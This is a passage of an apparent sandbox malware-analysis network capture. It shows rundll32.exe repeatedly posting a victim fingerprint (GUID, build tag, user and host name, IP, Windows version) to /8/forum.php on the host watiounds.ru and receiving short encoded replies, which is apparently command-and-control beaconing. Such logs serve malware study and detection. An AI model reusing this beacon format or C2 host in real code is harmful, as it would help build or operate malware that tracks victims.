                                          232 | 192.168.2.22 | 49397 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:09.537239075 CEST | 295 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:09.661247015 CEST | 295 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMYBNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          233 | 192.168.2.22 | 49398 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:09.987718105 CEST | 296 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:10.116424084 CEST | 296 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNGTMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          234 | 192.168.2.22 | 49399 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:10.434529066 CEST | 297 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:10.562772036 CEST | 297 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          235 | 192.168.2.22 | 49400 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:10.877664089 CEST | 298 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:11.004592896 CEST | 298 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYHSBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          236 | 192.168.2.22 | 49401 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:11.329940081 CEST | 299 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:11.454822063 CEST | 299 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAQJZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          237 | 192.168.2.22 | 49402 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:11.790491104 CEST | 300 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:11.914313078 CEST | 301 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 51 4a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYQJBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          238 | 192.168.2.22 | 49403 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:12.235331059 CEST | 301 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:12.359030962 CEST | 302 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYVEBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          239 | 192.168.2.22 | 49404 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:12.683267117 CEST | 303 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:12.812541008 CEST | 303 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          24 | 192.168.2.22 | 49189 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:34.212894917 CEST | 62 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:34.335050106 CEST | 62 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCCXXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          240 | 192.168.2.22 | 49405 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:13.142980099 CEST | 304 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:13.271701097 CEST | 304 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          241 | 192.168.2.22 | 49406 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:13.599517107 CEST | 305 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:13.728627920 CEST | 305 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYVEBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          242 | 192.168.2.22 | 49407 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:14.050673962 CEST | 306 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:14.178497076 CEST | 306 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHNMSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          243 | 192.168.2.22 | 49408 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:14.503915071 CEST | 307 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:14.632711887 CEST | 307 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          244 | 192.168.2.22 | 49409 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:14.946423054 CEST | 308 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:15.074197054 CEST | 308 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBJQYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          245 | 192.168.2.22 | 49410 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:15.399101019 CEST | 309 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:15.522481918 CEST | 310 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNTGMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          246 | 192.168.2.22 | 49411 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:15.839217901 CEST | 310 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:15.961679935 CEST | 311 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          247 | 192.168.2.22 | 49412 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:16.281735897 CEST | 311 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:16.405208111 CEST | 312 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVTGEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          248 | 192.168.2.22 | 49413 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:16.726711035 CEST | 313 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:16.850367069 CEST | 313 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHJQSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          249 | 192.168.2.22 | 49414 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:17.170702934 CEST | 314 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:17.299146891 CEST | 314 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          25 | 192.168.2.22 | 49190 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:34.651612997 CEST | 63 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:34.775614023 CEST | 63 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQKPJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          250 | 192.168.2.22 | 49415 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:17.616823912 CEST | 315 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:17.746145964 CEST | 315 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          251 | 192.168.2.22 | 49416 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:18.072494030 CEST | 316 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:18.198662996 CEST | 316 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNNMMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          252 | 192.168.2.22 | 49417 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:18.527034044 CEST | 317 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:18.657521963 CEST | 317 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNNMMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          253 | 192.168.2.22 | 49418 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:18.975282907 CEST | 318 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:19.098356962 CEST | 318 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
